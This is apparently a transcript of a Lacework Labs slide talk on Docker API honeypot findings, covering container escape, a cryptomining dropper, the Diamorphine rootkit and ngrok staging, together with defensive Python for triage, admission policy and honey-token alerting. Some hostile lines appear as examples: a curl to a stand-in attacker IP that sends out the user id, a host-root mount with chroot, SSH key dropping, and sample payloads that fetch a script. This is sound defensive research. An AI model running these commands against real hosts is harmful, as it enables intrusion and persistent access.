  Lacework Labs is the dedicated research team at Lacework. We decided to build with a focus on areas that we believe are not getting enough attention in the research community, specifically around new threats and attack surface risks within the public cloud. Like any good research team, we use a combination of data-driven intelligence creation and our own expertise in the key areas we focus on.

  • 3. Agenda
  ● The Shift to Container Workloads
  ● Honeypots
  ● Analyze The Data
  ● Container Focused Defenses

  • 4. Shifting to Container Workloads
  ● Enterprise continues to adopt container workloads.
    ○ This “shift left” mentality provides business advantages to get products to end-users faster.
  ● Adversaries have noticed, and have targeted misconfigurations around the container ecosystem, including:
    ○ T1190 - Code repositories / CI/CD pipelines
      ■ Ex: Gitlab
    ○ T1538 - Cloud Service Dashboards
    ○ T1552.007 - Exposed APIs for Containers.
  ● Lacework Labs has observed the introduction of “rogue images” into environments via:
    ○ T1610 - Deploying a container.
    ○ T1608 - Staging a malicious container on Docker Hub.

  • 5. Collecting Cloud Attack Data - Honeypots
  ● Honeypots
    ○ Emulate a service to a specific level of fidelity so an attacker throws an exploit/payload for collection.
  ● Consider the level of emulation fidelity you need.
    ○ Anecdotal example: a simple netcat listener on port 9200 for Elasticsearch has caught the same payloads as Elasticsearch honeypots that actually do a level of service emulation.
    ○ Consider the adversary you’re looking to catch data from
      ■ Opportunistic vs Targeted

  • 6. Building Whalehoney - A Docker Honeypot
  ● At the time of architecting our honeypot infrastructure, not many solutions existed for Docker that weren’t heavily tied to a particular database.
  ● Engineers at Lacework Labs developed a simple Python Flask based application to emulate the Docker API, based on the available documentation on the Docker engine.

  • 7. Quick Whalehoney Stats
  ● 244 unique payloads targeting the “api_container_create” endpoint
    ○ 24 payloads setting “privileged:true”
  ● 3 external SaaS services observed being used in attacks: Docker Hub, Ngrok, Weaveworks’ Scope
    ○ Ngrok being leveraged in 146 payloads.

  • 9. Deploy Container (T1610) & Escape to Host (T1611)
  ● Deploy container: achieved via exposed API
  ● Escape to Host: achieved via mounting the host’s “/” to the container’s “/mnt” and chrooting

  • 10. T1611 - From Container → Host Pivot
  (Diagram: attacker’s payload → exposed API port (2375) → mount /:/mnt && chroot /mnt)

  • 11. T1059.004 - Post-compromise Payloads - Shell Script Dropper
  (Diagram: attacker’s payload → exposed API port (2375) → mount /:/mnt && chroot /mnt)

  • 12. Post-compromise Payloads - Rootkits, Cryptominers, and ssh keys
  (Diagram: attacker’s payload → exposed API port (2375) → mount /:/mnt && chroot /mnt)

  • 13. Notable Execution of Initial Payload (cronb.sh)
  ● ~1500 line bash script (T1059.004) to deploy additional utilities, including:
    ○ Kill potential cryptocurrency miners on host.
    ○ Deploys their own XMRig cryptocurrency miner
  ● Observed TTPs:
    ○ Kills Alibaba (CloudMonitor/Aliyun) cloud monitoring agent (T1562.001)
    ○ Deploys SSH key for continued access (T1098.004)
    ○ Deploys .so’s for LD_PRELOAD attacks (T1574.006)
    ○ Deploys Diamorphine Rootkit for hiding access (T1014)
    ○ Naming ELF payloads <file_name>.jpg when downloading (T1036)
  ● Deploying C2 Agent (ZiggyStarTux/Kaiten/Tsunami - IRC Bot)
  ● curl <attacker_controlled_ip>/idcheck/$(id) (obtain user id)

  • 14. Notable Execution of Initial Payload (cronb.sh)
  (Figure: Ghidra pseudo-C of the shared objects grabbed by the Docker bash script; compare https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c)
  ● T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking
    ○ Used for persistence/defense evasion
  ● Attack script wgets a tar file of shared objects to be placed in /usr/local/lib and put in ld.so.preload.

  • 15. Defense Evasion/Persistence - Diamorphine Rootkit
  ● Rootkit (T1014) features include:
    ○ When loaded, the module starts invisible.
    ○ Hide/unhide any process by sending a signal 31.
    ○ Sending a signal 63 (to any pid) makes the module become (in)visible.
    ○ Sending a signal 64 (to any pid) makes the given user become root.
    ○ Files or directories starting with the MAGIC_PREFIX become invisible.
  ● Diamorphine is built on the victim machine, and has the MAGIC_PREFIX unchanged.
  (Figure: diamorphine.h from the attacker’s payload; see https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h)

  • 16. T1189 - Drive by Compromise (SSH Key Dropping)
  (Diagram: attacker’s payload → exposed API port (2375) → echo ssh key to /root/.ssh/authorized_keys)
  ● "cmd": ["sh", "-c", "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6VAjM6i8AAUtpl15<snippet>' >> /opt/root/.ssh/authorized_keys"]
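The slides above (7, 9-16) describe what an exposed Docker API receives: a container-create body with a privileged flag, the host root bound into the container, a chroot, a script fetch, and a write to authorized_keys. The following is an added example, not Whalehoney's code, of the triage logic a honeypot or API gateway log pipeline could run over such bodies; it tags each indicator with the ATT&CK technique the slides map it to and aggregates counts the way slide 7 does. The sample bodies are constructed and the ngrok hostname is a placeholder.

```python
"""Triage of Docker Engine API container-create bodies.

Added example, not Whalehoney's code: scores the JSON body an exposed
Docker API (port 2375) receives at /containers/create using the indicators
the slides describe. The sample bodies at the bottom are constructed; the
ngrok hostname in them is a placeholder.
"""
from __future__ import annotations

import json
import re
from collections import Counter

NGROK_RE = re.compile(r"https?://[a-z0-9.-]*ngrok\.io", re.I)
CHROOT_RE = re.compile(r"\bchroot\s+/\S*")
FETCH_RE = re.compile(r"\b(curl|wget)\b")


def _lower_keys(obj):
    """Docker accepts field names case-insensitively (Cmd/cmd, HostConfig/hostconfig)."""
    if isinstance(obj, dict):
        return {k.lower(): _lower_keys(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [_lower_keys(v) for v in obj]
    return obj


def _command_line(body: dict) -> str:
    """Flatten Entrypoint + Cmd into one string for pattern matching."""
    parts = []
    for key in ("entrypoint", "cmd"):
        value = body.get(key) or []
        parts.extend([value] if isinstance(value, str) else [str(v) for v in value])
    return " ".join(parts)


def triage_payload(raw: str) -> list[str]:
    """Return ATT&CK-tagged findings for one /containers/create request body."""
    body = _lower_keys(json.loads(raw))
    host_config = body.get("hostconfig") or {}
    findings = []
    if host_config.get("privileged") is True:
        findings.append("T1610 privileged container requested")
    for bind in host_config.get("binds") or []:
        # "/:/mnt" style bind: the host root becomes reachable from the container
        if str(bind).split(":", 1)[0] == "/":
            findings.append("T1611 host root bind-mounted into container")
    cmd = _command_line(body)
    if CHROOT_RE.search(cmd):
        findings.append("T1611 chroot into a mounted path")
    if "authorized_keys" in cmd:
        findings.append("T1098.004 write to authorized_keys")
    if NGROK_RE.search(cmd):
        findings.append("T1608 payload staged behind ngrok")
    if FETCH_RE.search(cmd):
        findings.append("T1059.004 remote script fetched from the command line")
    return findings


def summarize(raws: list[str]) -> dict[str, int]:
    """Count, per technique, how many captured bodies exhibited it (cf. slide 7)."""
    counts = Counter()
    for raw in raws:
        techniques = {finding.split(" ", 1)[0] for finding in triage_payload(raw)}
        counts.update(techniques)
    return dict(counts)


# Constructed sample bodies in the shape Whalehoney's api_container_create endpoint sees.
SAMPLE_PAYLOADS = [
    json.dumps({"Image": "alpine", "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
                "Cmd": ["sh", "-c", "chroot /mnt wget http://placeholder.ngrok.io/cronb.sh"]}),
    json.dumps({"Image": "alpine", "HostConfig": {"Binds": ["/:/opt"]},
                "Cmd": ["sh", "-c", "echo 'ssh-rsa AAAA<constructed>' >> /opt/root/.ssh/authorized_keys"]}),
    json.dumps({"Image": "nginx:latest", "Cmd": ["nginx", "-g", "daemon off;"]}),
]

if __name__ == "__main__":
    for raw in SAMPLE_PAYLOADS:
        print(triage_payload(raw))
    print(summarize(SAMPLE_PAYLOADS))
```

Matching on the bind source rather than the whole string matters: the slides show both /:/mnt and /:/opt, so the rule keys on "host root as source" and not on a particular mount point. Counting techniques per body (a set) rather than per finding keeps the summary comparable to the per-payload figures on slide 7.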
  • 18. T1608 - Staging Capabilities (Docker Hub)
  ● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a staging ground.

  • 19. T1608 - Staging Capabilities (Ngrok)
  ● Ngrok - legitimate utility for proxying local connections to public facing services (T1090).
    ○ Target users are developers that want to expose something local on the internet.
    ○ Think of it as reverse ssh tunnels-as-a-service
  ● How adversaries abuse it:
    ○ Hosting payloads behind ngrok.
      ■ Free tier/paid tiers exist.
    ○ Avoids having to set up infrastructure beyond a VM.

  • 20. Stopping The Compromise! Don’t expose the Docker Socket!
  (Diagram: attacker’s payload → exposed API port (2375) → mount /:/mnt && chroot /mnt)

  • 21. Beyond ACLs & Limiting exposed container APIs - Docker Content Trust (DCT)
  ● Leverage Docker Content Trust (DCT) to enforce digital signatures for runtime verification of images in your environment.
    ○ Prevent non-signed images from running.
    ○ Caveat: DCT is enabled/disabled via an environment variable.
  ● Docker Notary
    ○ Built around The Update Framework
  ● Does introduce additional management overhead of handling signing keys/revocations/etc.
  Reference: https://docs.docker.com/engine/security/trust/

  • 22. Beyond ACLs & Limiting exposed container APIs - Securing Kubernetes Deployments
  ● Prevent accidental exposure of management dashboards!
    ○ Including 3rd party integrations (Argo/Gitlab/etc.)
  ● Open Policy Agent (OPA) Enforcement!
    ○ Admission controller to prevent privileged pods or unnecessary capabilities being paired with deployments in given namespaces.
    ○ Ex: prevent CAP_SYS_ADMIN from being set on a deployment.
  ● Deploy Signed Containers
    ○ GCP’s GKE - Binary Authorization
      ■ Ensure deployed workloads have been signed.
    ○ AWS EKS image signing is on their road map according to documentation
      ■ https://aws.github.io/aws-eks-best-practices/security/docs/image/
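Slides 21 and 22 ask for admission-time policy: no privileged pods, no CAP_SYS_ADMIN, enforcement scoped to given namespaces, and only signed images deployed. The block below is an added example, not the talk's code and not a Rego policy; it models those rules in Python so the decision logic can be read and unit-tested before it is ported to OPA/Gatekeeper. "Signed" is approximated as "from a trusted registry and pinned by digest"; the signature check itself belongs to Notary or Binary Authorization. The registry name, namespace list and sample manifests are assumptions.

```python
"""Admission-style policy checks for Kubernetes pod manifests.

Added example, not the talk's own code and not a Rego policy: models in
Python the rules the slides ask an OPA admission controller to enforce
(no privileged pods, no CAP_SYS_ADMIN, scoped to given namespaces) plus a
stand-in for "deploy signed containers": images must come from a trusted
registry and be pinned by digest. Signature verification itself is left
to Notary/Binary Authorization. The registry name, namespaces and sample
manifests below are assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Policy:
    enforced_namespaces: frozenset[str] = frozenset({"prod", "staging"})
    # SYS_MODULE is listed alongside SYS_ADMIN because loading a kernel rootkit needs it
    forbidden_caps: frozenset[str] = frozenset({"SYS_ADMIN", "SYS_MODULE"})
    allowed_registries: tuple[str, ...] = ("registry.example.internal/",)  # assumed registry
    require_digest: bool = True


DEFAULT_POLICY = Policy()


def _all_containers(spec: dict) -> list[dict]:
    return list(spec.get("initContainers") or []) + list(spec.get("containers") or [])


def evaluate_pod(pod: dict, policy: Policy = DEFAULT_POLICY) -> list[str]:
    """Return the list of policy violations; an empty list means admit."""
    namespace = (pod.get("metadata") or {}).get("namespace", "default")
    if namespace not in policy.enforced_namespaces:
        return []  # the slides scope enforcement to given namespaces
    spec = pod.get("spec") or {}
    violations = []
    for volume in spec.get("volumes") or []:
        host_path = volume.get("hostPath") or {}
        if host_path.get("path") == "/":
            violations.append(f"volume {volume.get('name')}: hostPath / exposes the node filesystem")
    for container in _all_containers(spec):
        name = container.get("name", "?")
        sec = container.get("securityContext") or {}
        if sec.get("privileged"):
            violations.append(f"container {name}: privileged=true")
        for cap in (sec.get("capabilities") or {}).get("add") or []:
            # Kubernetes spells it SYS_ADMIN; accept the CAP_ prefix as well
            if cap.upper().removeprefix("CAP_") in policy.forbidden_caps:
                violations.append(f"container {name}: capability {cap} not permitted")
        image = container.get("image", "")
        if not image.startswith(policy.allowed_registries):
            violations.append(f"container {name}: image {image} not from a trusted registry")
        if policy.require_digest and "@sha256:" not in image:
            violations.append(f"container {name}: image {image} not pinned by digest")
    return violations


# Constructed manifests: one shaped like the slides' mount-and-chroot abuse, one clean, one out of scope.
SAMPLE_PODS = [
    {"metadata": {"name": "miner-like", "namespace": "prod"},
     "spec": {"volumes": [{"name": "host", "hostPath": {"path": "/"}}],
              "containers": [{"name": "app", "image": "docker.io/library/alpine:latest",
                              "securityContext": {"privileged": True,
                                                  "capabilities": {"add": ["CAP_SYS_ADMIN"]}},
                              "volumeMounts": [{"name": "host", "mountPath": "/mnt"}]}]}},
    {"metadata": {"name": "web", "namespace": "prod"},
     "spec": {"containers": [{"name": "web",
                              "image": "registry.example.internal/web@sha256:" + "0" * 64}]}},
    {"metadata": {"name": "legacy", "namespace": "dev"},
     "spec": {"containers": [{"name": "x", "image": "alpine",
                              "securityContext": {"privileged": True}}]}},
]

if __name__ == "__main__":
    for pod in SAMPLE_PODS:
        print(pod["metadata"]["name"], evaluate_pod(pod) or "admit")
```

The third manifest is admitted only because its namespace is outside the enforced set; that is the scoping the slide describes, and it is also the gap to watch, since a pod in an unenforced namespace can still bind the node root. Tighten the namespace set (or invert it to an allow-list of exempt namespaces) once the policy has been tuned.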
  • 23. Beyond ACLs & Limiting exposed container APIs - Exploring Runtime Protection Options
  ● Profile and limit the syscalls your application makes!
    ○ Runtime syscall allow-listing via seccomp
  ● Can be tricky to tune, but greatly reduces attack surface in the event of an application compromise.
  Reference: https://www.lacework.com/blog/sand-honey-building-honeypots/

  • 24. Beyond ACLs & Limiting exposed container APIs - Honey Tokens in Cloud Native Environments
  ● What about non-opportunistic attackers?
    ○ Targeting resource-specific services
    ○ Ex: Managed DBs, Container Registries, etc.
  ● Proactive defenses via “honey tokens” around specific cloud native resources
    ○ Ex: Container Registry named beta-database-secrets-test
  Reference: https://www.lacework.com/blog/diy-canary-tokens-in-aws
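Slide 24 proposes a decoy container registry, named to look like it holds secrets, as a tripwire for targeted rather than opportunistic attackers. The block below is an added example, not the talk's or the referenced blog's code, of the alerting side: every ECR API call that names the decoy repository is raised, including denied calls, since a decoy has no legitimate consumers. The event lines are constructed in CloudTrail's field layout; the account id, ARNs and IP addresses are placeholders.

```python
"""Honey-token alerting over CloudTrail-style ECR events.

Added example, not the talk's or the blog's code: a decoy container
repository such as the slide's beta-database-secrets-test has no
legitimate consumers, so any ECR API call naming it is an alert worth
paging on. The event lines below are constructed in CloudTrail's field
layout; the account id, ARNs and IPs are placeholders.
"""
from __future__ import annotations

import json

HONEY_REPOSITORIES = frozenset({"beta-database-secrets-test"})  # decoy name from slide 24


def honey_token_alerts(event_lines: list[str]) -> list[dict]:
    """Return one alert per ECR event that references a decoy repository."""
    alerts = []
    for line in event_lines:
        event = json.loads(line)
        if event.get("eventSource") != "ecr.amazonaws.com":
            continue
        repo = (event.get("requestParameters") or {}).get("repositoryName")
        if repo not in HONEY_REPOSITORIES:
            continue
        alerts.append({
            "time": event.get("eventTime"),
            "action": event.get("eventName"),
            "repository": repo,
            "principal": (event.get("userIdentity") or {}).get("arn"),
            "source_ip": event.get("sourceIPAddress"),
            "error": event.get("errorCode"),  # set when IAM denied the call; a denied touch still counts
        })
    return alerts


# Constructed events: a normal CI pull, a decoy pull, and a call with no repository at all.
SAMPLE_EVENTS = [
    json.dumps({"eventTime": "2022-01-01T00:00:00Z", "eventSource": "ecr.amazonaws.com",
                "eventName": "DescribeImages", "sourceIPAddress": "203.0.113.10",
                "userIdentity": {"arn": "arn:aws:iam::000000000000:role/ci-runner"},
                "requestParameters": {"repositoryName": "web-frontend"}}),
    json.dumps({"eventTime": "2022-01-01T00:05:00Z", "eventSource": "ecr.amazonaws.com",
                "eventName": "BatchGetImage", "sourceIPAddress": "198.51.100.7",
                "userIdentity": {"arn": "arn:aws:iam::000000000000:user/leaked-key"},
                "requestParameters": {"repositoryName": "beta-database-secrets-test"}}),
    json.dumps({"eventTime": "2022-01-01T00:06:00Z", "eventSource": "ecr.amazonaws.com",
                "eventName": "GetAuthorizationToken", "sourceIPAddress": "198.51.100.7",
                "userIdentity": {"arn": "arn:aws:iam::000000000000:user/leaked-key"},
                "requestParameters": None}),
]

if __name__ == "__main__":
    for alert in honey_token_alerts(SAMPLE_EVENTS):
        print(alert)
```

The value of the alert is its near-zero false-positive rate: the principal and source address in the single hit are exactly the pivot points an incident responder needs, and because the decoy is never used by real workloads, any hit at all indicates enumeration of the registry rather than normal CI traffic.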
  • 25. Tool Release! Whalehoney, simple API emulation
  Docker Honeypot - Whalehoney: https://www.github.com/lacework-dev/whalehoney-PUBLIC

  • 26. Recap
  Observed ATT&CKs
  ● T1610/T1611 - Deploy containers and escape to host.
  ● T1059.004 - Post-compromise payloads (Shell Script)
  ● T1562.001 - Impairing Defenses
  ● T1098.004 - Deploying ssh keys for persistence
  ● T1574.006/T1014 - LD_PRELOAD/KOs for hijacking execution flow
  Defending In the Cloud
  ● Limit attack surface exposure (ingress/egress ACLs)
  ● Enforce signed container image deployments
  ● Implement security policies restricting which API calls are possible
  ● OPA for security policy enforcement of Kubernetes
  ● Proactive Defense via Honey Tokens

  • 27. Thank you. IF YOU HAVE QUESTIONS, PLEASE GET IN TOUCH WITH laceworklabs@lacework.com